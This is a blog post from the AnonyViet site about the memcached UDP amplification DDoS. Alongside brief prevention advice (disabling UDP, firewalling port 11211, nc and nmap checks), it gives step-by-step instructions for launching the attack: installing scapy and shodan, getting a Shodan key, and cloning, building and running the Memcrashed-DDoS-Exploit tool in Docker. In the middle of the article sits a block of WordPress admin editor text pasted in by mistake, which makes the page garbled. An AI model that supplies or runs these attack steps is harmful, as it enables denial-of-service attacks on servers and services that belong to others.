• Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
AnonyViet - English Version
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
AnonyViet - English Version
No Result
View All Result
Home Tips

Instructions for DDOS memcached and how to prevent it

AnonyViet by AnonyViet
February 16, 2023
in Tips
0
0
SHARES
Share on FacebookShare on Twitter

This is a new DDOS attack method that appeared in early 2018. Security experts discovered that Hackers have performed DDOS attacks in a new way. This time, the attack power was 51,000 times larger than normal (the largest in history).

Join the channel Telegram belong to AnonyViet ? Link ?

Understanding Memcached Attacks

Memcached is the name given to this type of large-scale attack. The special thing about this type of attack is the ability to amplify power more than 51000 times. This has shaken experts and shocked the history of world security.

This method takes advantage of the mamcached vulnerability – the system stores copies of objects. Data here is exchanged many times and continuously to speed up access. This system is often used to optimize data retrieval from the database. To provide a better experience for web browsing.

The system is a strong point but at the same time a weak point for hackers to attack. In the near future, security experts worry that hackers will take advantage of this to create even larger DDOS attacks.

Recent victim?

Our recent victim is not too strange that is Github (Exchange and source code management page for programmers). Github was hit by a rain of bullets and was almost paralyzed, their security team had to focus all their efforts for hours on fixing the problem.

In the past week, hackers (hackers) have deployed many attacks with a volume of more than 500Gb/s coming from UDP port 11211.

Instructions for DDOS memcached and how to prevent it

How to attack

This type of amplification attack has almost the same attack mechanism. The hacker will spoof the target IP, and then send the spoofed request to a weakly defensive UDP server. At that time, the UDP server does not recognize the spoofed IP and responds with a large amount of data to the target.

This attack will amplify and cause great impact and damage. Because the packets when the UDP system responds will usually be much larger than the request (so called amplification).

Do you know the service of Cloudflare CDN? A popular DDOS prevention service. Their team investigated and determined this attack came from about 6000 memcached servers.

More headache, they also said that there are currently more than 93,000 similar servers in the world. Therefore, the future attack potential with destructive power is many times greater. We should find out how to fix it as soon as possible.

Prepare

Install Python (version 3.0 or later) as an attack tool.

apt-get install python3

Install two more Modules, scapy and shodan.

pip install scapy
pip install shodan

Perform

First, we will use the Shodan API. But to use it, you need a Shodan API. Visit the link below to register to use the Shodan API.

Register Shodan API

Remember to skip the ad to support Anonyviet.

However, to get a free key without spending money you have to use edu mail. Let them understand that you are a student and use it for learning purposes, so it’s free. The security code for memchached has been announced.

Skip to main contentSkip to toolbar Dashboard Posts All Posts Add New Categories Tags Media Library Add New Pages All Pages Add New Comments All Comments Contact Contact Forms Add New Profile Tools WPBakery Page Builder About Grid Builder Redirects Collapse menu About WordPress AnonyViet 00 comments awaiting moderation New SEOEnter a focus keyword to calculate the SEO score Howdy, Lmint Log Out Help Screen Options Add New Post Thank you for updating Insert Post ADS!  This update features en stories from video intelligence - a video player that supplies both content and video advertising.  Watch a demo.  To begin earning sign up to vi stories and place the ad live now!  Read the FAQ.  Click the 'Monetize Now' button to activate en stories.  You'll agree to share your domain, affiliate ID and email with video intelligence, and begin your journey to video publisher.Monetize Now Dismiss this notice.  Enter title here Instructions for DDOS memcached and how to prevent Permalink: https://anonyviet.com/huong-dan-ddos-m…cach-phong-chong/ ‎Edit Add Media Shortcodes Insert shortcodeVisualText File Edit Insert View Format Table Tools Paragraph Verdana 11ptFormats Shortcodes Word count: 917 Draft saved at 11:53:15 am.  Toggle panel: OneSignal Push Notifications OneSignal Push Notifications Send notification on post publish Toggle panel: Publish Publish Save Draft Preview (opens in a new window) Status: Draft Edit Edit status Visibility: Public Edit Edit visibility Publish immediately Edit Edit date and time Readability: OK SEO: Not available Move to TrashPublish Toggle panel: Format Format Toggle panel: Yoast internal linking Yoast internal linking Toggle panel: Categories Categories All Categories Most Used Featured MMO Advertisers - Publishers Affiliate Program Pay Per Click - PPC Network Hyper -V Linux Basic Networking Windown Server 2012 Security Basic Hacking DDOS Deface Kali Linux / Backtrack SQL Injection Virus-Trojan-Rat Software Phone Software Tricks Code Facebook Computer Tips Windows 7/8/10 News Uncategorized Video Tutorials Graphics + Add New Category Toggle panel: Tags Tags Add New Tag Add Separate tags with commas Choose from the most used tags Toggle pan  el: Featured Video Featured Video Toggle panel: Featured Image Featured Image Set featured image Toggle panel: HTTPS HTTPS Secure post Secure child posts Toggle panel: Show AMP for Current Page?  Show AMP for Current Page?  Show Hide Toggle panel: Post Adverts Post Adverts Toggle panel: Post Settings Post Settings Toggle panel: Yoast SEO Premium Yoast SEO Premium Need help?  Content optimization Enter a focus keyword to calculate the SEO scoreSocial Readability OK Enter your focus keyword + Add keyword Snippet preview Show information about the snippet editorYou can click on each element in the preview to jump to the Snippet Editor.  SEO title preview:DDOS memcached guide and how to prevent it » AnonyViet Slug preview:https://anonyviet.com/huong-dan-ddos-memcached-va-cach-phong-chong/ Meta description preview:This is an attack method New DDOS attack appeared in early 2018. Security experts discovered that Hackers have performed DDOS attacks in a new way.  This time, the attack power was 51,000 times larger than normal (the largest in history).  Understanding the type of Memcached Attack Memcached is what it is called Edit snippet Focus keyword Show information about the focus keyword Enter a focus keyword This article is cornerstone content Analysis Show information about the content analysis Problems (3) No focus keyword was set for this page .  If you do not set a focus keyword, no score can be calculated.  No meta description has been specified.  Search engines will display copy from the page instead.  No internal links appear in this page, consider adding some as appropriate.  Improvements (2) The images on this page contain alt attributes.  The slug for this page is a bit long, consider shortening it.  Good results (3) The text contains 862 words.  This is more than or equal to the recommended minimum of 300 words.  This page has 0 nofollowed outbound link(s) and 1 normal outbound link(s).  The SEO title has a nice length.  Insights Prominent words The following words and word combinations occur the most in the content.  These give an indication of what your content focused on.  If the words differ a lot from your topic, you might want to rewrite your content accordingly.  hack your server security experts ddos ​​attack experts Read our ultimate guide to keyword research to learn more about keyword research and keyword strategy.  Toggle panel: Excerpt Excerpt Excerpt Excerpts are optional hand-crafted summaries of your content that can be used in your theme.  Learn more about manual excerpts.  Toggle panel: Send Trackbacks Send Trackbacks Send trackbacks to: Separate multiple URLs with spaces Trackbacks are a way to notify legacy blog systems that you've linked to them.  If you link other WordPress sites, they'll be notified automatically using pingbacks, no other action necessary.  Toggle panel: Custom Fields Custom Fields Name Value Add New Custom Field: Name Value Enter new Add Custom Field Custom fields can be used to add extra metadata to a post that you can use in your theme.  Toggle panel: Discussion Discussion Allow comments Allow trackbacks and pingbacks on this page Toggle panel: Slug Slug Slug Toggle panel: Author Author Author Author Toggle panel: Custom AMP Editor Custom AMP Editor Use This Content as AMP Content If you want to add some special tags, then please use normal HTML into this area, it will automatically convert them into AMP compatible tags.  Add Media Shortcodes Insert shortcodeVisualText File Edit Insert View Format Table Tools Paragraph Verdana 11ptFormats Shortcodes Copy The Content Toggle panel: AMP Page Builder AMP Page Builder Start the AMP Page Builder Thank you for creating with WordPress.  Version 4.9.4 Link inserted.  No results found.  Close media panel Add Media Create Gallery Create Audio Playlist Create Video Playlist Featured Image Insert from URL Add Media Upload FilesMedia Library Filter by typeFilter by dateSearch Media Search media items... Deselect ATTACHMENT DETAILS 1-5.png March 20, 2018 29 KB 728 × 380 Edit Image Delete Permanently URL https://anonyviet.com/wp-content/uploads/2018/03/1-5.png Title 1 Caption Alt Text DDOS memcached instructions and prevention Description Required fields are marked * Slide link Shortcodes Ultimate Use this field to add custom links to slides used with Slider, Carousel and Custom Gallery shortcodes ATTACHMENT DISPLAY SETTINGS Alignment Link To http:// Size 1 selected Clear Insert into post Select file

Instructions for DDOS memcached and how to prevent it

Instructions for DDOS memcached and how to prevent 4

Instructions for DDOS memcached and how to prevent it 5

Using Docker

You can use Alpine to deploy this tool on the Server and use. Watch the demo video below.

git clone https://github.com/649/Memcrashed-DDoS-Exploit.git
cd Memcrashed-DDoS-Exploit
echo "SHODAN_KEY" > api.txt
docker build -t memcrashed .
docker run -it memcrashed

Remember to type ‘y’ or ‘n’ when asked to press interactively. Y is yes, N is no.

Download Tool Memcrashed-DDoS-Exploit

This is a tool written in python and used in version 3.0 and above.

See how to use it in combination with Shodan and Docker in the video above.

Download

Solution to handle this new form of attack

While waiting for the radical remedy you should temporarily take precautions. Here is a list of things you need to do now to prevent it.

For memcached users

If you are using then disable UDP support if not using it. At memcached startup you can specify –listen 127.0.0.1 to listen on localhost and -U 0 to completely disable the UDP method.

Because by default, memcached listens on INADDR_ANY and runs if you open the UDP protocol. I will leave an English document from Github experts in the link below. If you are interested, you can go in for an in-depth study.

Document Viewer

Remember to skip the ad to support me.

To check if your server is down, use the following simple command:

$ echo -en “\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n” | nc -q1 -u 127.0.0.1 11211

If there are results returned like in the image below, it means that your server has an error. If there is no response, your server is temporarily safe.

Instructions for DDOS memcached and how to prevent it

Solutions for system administrators

You should do is install a firewall (firewall) to prevent all connections to port 11211. If you want to check if they are accessed via UDP protocol, you can use the “echo” command to check as above.

Or use the nmap command to check the status of port 11211 on the Server.

$ nmap TARGET -p 11211 -sU -sS –script memcached-info
Starting Nmap 7.30 ( https://nmap.org ) at 2018-02-27 12:44 UTC
Nmap scan report for xxxx
Host is up (0.011s latency).
PORT      STATE         SERVICE
11211/tcp open          memcache
| memcached-info:
|   Process ID           21357
|   Uptime               41557524 seconds
|   Server time          2018-02-27T12:44:12
|   Architecture         64 bit
|   Used CPU (user)      36235.480390
|   Used CPU (system)    285883.194512
|   Current connections  11
|   Total connections    107986559
|   Maximum connections  1024
|   TCP Port             11211
|   UDP Port             11211
|_  Authentication       no
11211/udp open|filtered memcache

Solutions for web developers

The best thing is that we should stop using UDP protocol. But if you must use it, please don’t enable it by default. If you must use UDP, make sure the packet is equal to or smaller than the incoming request. Avoid the amplification effect when the DDOS packet arrives.

Like Fanpge or follow website for quick updates of good articles.

Good luck
Lmint.

The article achieved: 5/5 – (100 votes)

Previous Post

Tut Facebook Dame 5s IP Ship – March 2018

Next Post

How to see how Facebook is tracking you

AnonyViet

AnonyViet

Related Posts

Instructions to create your own ChatGPT Bot on Telegram
Tips

Instructions to create your own ChatGPT Bot on Telegram

March 27, 2023
How to use ChatGPT-4 for free on Chrome and FireFox
Tips

How to use ChatGPT-4 for free on Chrome and FireFox

March 27, 2023
[Facebook] Latest TUT Rip
Tips

[Facebook] Latest TUT Rip

March 26, 2023
[Facebook] Summary of Facebook report spells
Tips

[Facebook] Summary of Facebook report spells

March 25, 2023
How to use the Fn key on a laptop keyboard
Tips

How to use the Fn key on a laptop keyboard

March 24, 2023
Unleash your creativity and expand your image with the DALL-E 2
Tips

Unleash your creativity and expand your image with the DALL-E 2

March 24, 2023
Next Post

How to see how Facebook is tracking you

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Recent News

Instructions to create your own ChatGPT Bot on Telegram

Instructions to create your own ChatGPT Bot on Telegram

March 27, 2023
How to use ChatGPT-4 for free on Chrome and FireFox

How to use ChatGPT-4 for free on Chrome and FireFox

March 27, 2023
[Facebook] Latest TUT Rip

[Facebook] Latest TUT Rip

March 26, 2023
How to unlock the hidden FM Radio feature on your phone

How to unlock the hidden FM Radio feature on your phone

March 26, 2023
Instructions to create your own ChatGPT Bot on Telegram

Instructions to create your own ChatGPT Bot on Telegram

March 27, 2023
How to use ChatGPT-4 for free on Chrome and FireFox

How to use ChatGPT-4 for free on Chrome and FireFox

March 27, 2023
[Facebook] Latest TUT Rip

[Facebook] Latest TUT Rip

March 26, 2023
AnonyViet – English Version

AnonyViet

AnonyViet is a website share knowledge that you have never learned in school!

We are ready to welcome your comments, as well as your articles sent to AnonyViet.

Follow Us

Contact:

Email: anonyviet.com[@]gmail.com

Main Website: https://anonyviet.com

Recent News

Instructions to create your own ChatGPT Bot on Telegram

Instructions to create your own ChatGPT Bot on Telegram

March 27, 2023
How to use ChatGPT-4 for free on Chrome and FireFox

How to use ChatGPT-4 for free on Chrome and FireFox

March 27, 2023
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office

© 2023 JNews - Premium WordPress news & magazine theme by Jegtheme.